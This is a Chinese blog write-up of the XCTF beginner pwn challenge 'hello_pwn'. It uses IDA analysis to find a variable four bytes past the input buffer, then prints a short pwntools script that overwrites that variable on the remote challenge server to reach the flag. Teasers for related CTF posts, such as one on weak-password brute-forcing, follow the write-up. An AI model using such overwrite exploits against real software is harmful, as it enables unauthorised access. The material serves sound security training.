当前位置:首页 > CTF > 攻防世界 > 正文内容

XCTF_pwn新手区_hellopwn

七星11个月前 (05-26)攻防世界883

下载题目,运行之,得未知物,非flag:

image.png

丢ida,找main函数,f5分析:

image.png

有个if判断,如果条件成立,执行sub_400686()这个函数.双击这个函数进去看看:

image.png

那就是说,只要让dword_60106C 等于 1853186401就能getflag了

看一下这两个变量的相对偏移量:

image.png

相对偏移量是4,我们用输入的unk_601068变量,把dword_60106C覆盖掉,

于是payload就是这样的:

4*'a' + p64(1853186401)

然后exp就有了:

#-*-coding:utf-8 -*-
from pwn import *
p = remote("124.126.19.106","38660")
p.recvuntil("bof")
payload = 4*'a' + p64(1853186401) #构造的payload
p.sendline(payload)    #输入
p.interactive()

image.png

运行getflag

七星比特|qixingbit.com

相关文章

XCTF_web新手区_weakauth

XCTF_web新手区_weakauth

这是一道爆破题,从题目名称就可以看出来.开启场景,是一个登录验证框写一个弱密码字典,用burpsuite爆破一下:抓一下包,并丢到intruder模块去然后发现变量默认是添加好了的,只需要添加字典然后...

XCTF_crypto进阶区_你猜猜

XCTF_crypto进阶区_你猜猜

拿到题:根据做misc的经验,他是一个文件,看文件头:504B0304就知道是个zip.丢到hex里面提取出来:加密的.所以是真加密.然后, 爆破呗.一般爆破题纯数字.工具可以百度.直接出flag...

XCTF_web新手区_xffreferer

XCTF_web新手区_xffreferer

开题,创建场景,根据提示,是有关伪造xff和referer的.创景给出地址为123.123.123.123.下面记录一下什么是XFF-refererX-Forwarded-For:简称XFF头,它代表...

XCTF_web新手区_simple-js

XCTF_web新手区_simple-js

得到题目,创建场景,是个弹窗,让输入密码.随便输点东西,测试一下,发现没什么用..根据题目,应该和js有关系,然后f12查看代码,发现了一个函数上面这个代码的函数部分写的很...函数的功能就是无论输入...

XCTF_pwn新手区_whendidyouborn

XCTF_pwn新手区_whendidyouborn

pwnpwn的变量覆盖相关.开启场景,下载附件,放到Linux执行一下.大概就是让你输个年龄,然后姓名,根据输入返回结果.然后拖到ida里面分析一下.这个程序是64位的,所以用64位ida打开.选中m...

XCTF_web进阶区_Training-WWW-Robots

XCTF_web进阶区_Training-WWW-Robots

开题,创建场景:其实根据题目名称,可以猜到是考robots的,但还是看一下他说了啥:直接访问/robots.txt然后出现了flag文件,访问获得flag:...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。